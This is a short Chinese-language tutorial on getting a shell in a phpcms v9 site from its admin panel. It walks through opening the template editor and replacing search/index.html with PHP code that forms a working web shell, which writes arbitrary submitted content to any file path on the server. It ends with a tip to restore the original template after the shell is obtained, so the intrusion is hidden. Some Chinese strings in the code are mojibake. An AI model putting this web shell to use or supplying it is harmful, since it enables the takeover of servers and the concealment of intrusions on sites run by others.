phpcms v9后台拿shell

登录进入后台管理后，点击界面，模板风格，然后点击祥细列表，如下图：

 

 

 

然后点击 search 这个文件夹，如下图：

 

 

然后点击修改 index.html 文件

然后把以下代码复制上去提交。

 

 

 

<?php defined('IN_PHPCMS') or exit('No permission resources.'); ?><?php
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
<form method="POST">
淇濆瓨鏂囦欢鍚? <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>">
<br><br>
<textarea name="text" COLS="70" ROWS="18" ></textarea>
<br><br>
<input type="submit" name="submit" value="淇濆瓨"> 
<form>
<?php
if(isset($_POST['file']))
{
   $fp = @fopen($_POST['file'],'wb');
   echo @fwrite($fp,$_POST['text']) ? '淇濆瓨鎴愬姛!' : '淇濆瓨澶辫触!';
   @fclose($fp);
}
?>

　　提示：修改前先把原来的代码备份一下，拿到shell后把他改回去。

 

 

提交后点击可视化一下